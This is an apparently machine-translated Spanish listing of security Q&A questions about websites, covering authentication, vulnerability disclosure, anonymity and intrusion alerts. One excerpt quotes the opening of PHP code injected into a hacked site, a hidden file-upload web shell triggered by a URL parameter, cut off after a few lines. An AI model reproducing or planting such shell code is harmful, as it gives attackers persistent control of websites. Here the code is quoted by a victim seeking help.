Preguntas con etiqueta 'websites'

2
respuestas

Cómo monitorear una página web protegida por contraseña

Quiero usar un monitor de sitio web para verificar que una página web funciona, pero la página web requiere que el usuario esté autenticado. ¿Existe una forma astuta de lograr esto que no requiera almacenar un ticket de autenticación con el s...
hecha 13.11.2018 - 18:28
0
respuestas

Las llamadas ajax sucias me permiten obtener pizza gratis [duplicar]

Recientemente, mi amigo en el trabajo quería pedir algo de comida para el almuerzo de un sitio web que usualmente ordenamos. El sitio permite al visitante convertirse en miembro del sitio al registrarse y luego iniciar sesión. Al convertirs...
hecha 16.08.2018 - 17:28
1
respuesta

Mi sitio fue hackeado y ha inyectado código en index.php y 404.php [duplicado]

Aquí está el código inyectado en index.php if(@isset($_GET[bots])){ echo '<form action="" method="post" enctype="multipart/form-data" name="silence" id="silence">'; echo '<input type="file" name="file"><input name="gol...
hecha 08.08.2018 - 11:24
2
respuestas

¿Qué es lo responsable de hacer cuando me importa una vulnerabilidad más que el equipo detrás del sistema? [duplicar]

He encontrado una vulnerabilidad de seguridad en un sitio web. El sitio web es el de una marca líder en su industria. Hay cuentas de usuario, etc. y este sitio web es muy popular. Me he contactado con varias personas de su equipo de desarro...
hecha 31.08.2018 - 11:51
0
respuestas

¿Se han autenticado los formularios recomendados por Microsoft en Windows Auth?

Mi equipo está debatiendo el uso de la autenticación de Windows para un sitio web público. He estado revisando los formularios y puedo ver las numerosas vulnerabilidades de seguridad al responder en NTML, y puedo ver el consejo general de "auten...
hecha 12.05.2018 - 07:22
1
respuesta

¿Puedo crear un sitio web en wordpress de forma anónima? [duplicar]

Si utilizo una VPN que no mantiene registros y crea una cuenta de correo electrónico, la uso para crear un sitio web de wordpress (que todavía usa la VPN) y no proporciono información personal (dirección, nombre, etc.). ¿Qué tan anónimo sería...
hecha 01.08.2017 - 02:44
1
respuesta

¿Tiene un sitio web HTTP o HTTPS?

Hubo algunas preguntas sobre este tema, pero ninguna de ellas se discutió si hay alguna explicación, y si enlace es suficiente para algún tipo de sitio web. He visto muchos sitios web de escuelas secundarias con solo enlace , por lo que no...
hecha 18.09.2016 - 20:03
1
respuesta

¿Dónde exponer fallas en la seguridad? [duplicar]

Algunos sitios web tienen fallas de seguridad ridículas. Afortunadamente, el público se está volviendo cada vez más consciente y muchos sitios están corrigiendo los más obvios, como la falta de HTTPS, las pautas de creación de contraseñas d...
hecha 15.07.2016 - 15:54
0
respuestas

Beneficios / negativos de la autenticación sin contraseña

Me enfrento al siguiente dilema: Tengo un cliente que tiene un panel de administración muy básico, lo usa una o dos veces por semana y no puede hacer mucho, principalmente actualizar contenido y agregar productos. Actualmente, el panel de...
hecha 18.04.2016 - 09:55
0
respuestas

¿Cómo puedo rastrear el origen de un intento de intrusión?

Norton Internet Security Consumer sigue mostrando una alerta de intrusión cuando los usuarios de IE (con el software instalado) intentan acceder al sitio. La severidad es alta. "An intrusion attempt by tridentesquebitumen0.tds-technology.biz w...
hecha 08.08.2016 - 00:45